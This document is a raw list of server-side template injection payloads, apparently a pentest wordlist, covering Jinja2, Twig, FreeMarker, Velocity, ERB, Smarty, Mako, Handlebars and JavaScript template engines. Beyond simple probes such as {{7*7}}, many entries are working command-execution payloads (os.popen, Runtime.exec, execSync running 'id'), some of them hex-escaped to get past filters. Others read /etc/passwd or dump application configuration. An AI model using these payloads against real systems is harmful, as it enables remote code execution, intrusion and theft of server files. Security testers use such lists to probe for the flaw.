{{7*7}}
{{7*'7'}}
{{config}}
{{self.__class__.__mro__}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__bases__[0].__subclasses__()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{_self.env}}
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.server.get('document_root')}}
${7*7}
${.now}
${.version}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation()}
<#assign classloader=product.class.protectionDomain.classLoader><#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")><#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)><#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>${dwf.newInstance(ec,null)("id")}
#set($x=7*7)$x
#set($str=$class.inspect("java.lang.String").type)#set($chr=$class.inspect("java.lang.Character").type)#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime())$ex.exec("id")
$class.inspect("java.lang.Runtime").type.getRuntime().exec("id")
${"freemarker.template.utility.Execute"?new()("id")}
<%= 7*7 %>
<%= system("id") %>
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>
`id`
{7*7}
{php}echo 'test';{/php}
{system('id')}
{$smarty.version}
{$smarty.template_object->smarty->security_policy}
{math equation='log(1)'}
${7*7}
<%import os; x=os.popen('id').read()%>${x}
<%
import os
x=os.popen('id').read()
%>
${x}
{{"7"*7}}
{{7*7}}
{%- set ns = namespace(found=false) -%}
@(7*7)
@{7*7}
<#if 7*7==49>true</#if>
[#if 7*7==49]true[/#if]
#{7*7}
*{7*7}
{7*7}
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{/with}}{{/with}}{{/with}}
{{#each this}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}
<%= %>
{{dump(app)}}
{{app.request.server.get('HTTP_HOST')}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id').toString()")()}}
{{this.constructor.constructor('return global.process.mainModule.require("child_process").execSync("id").toString()')()}}
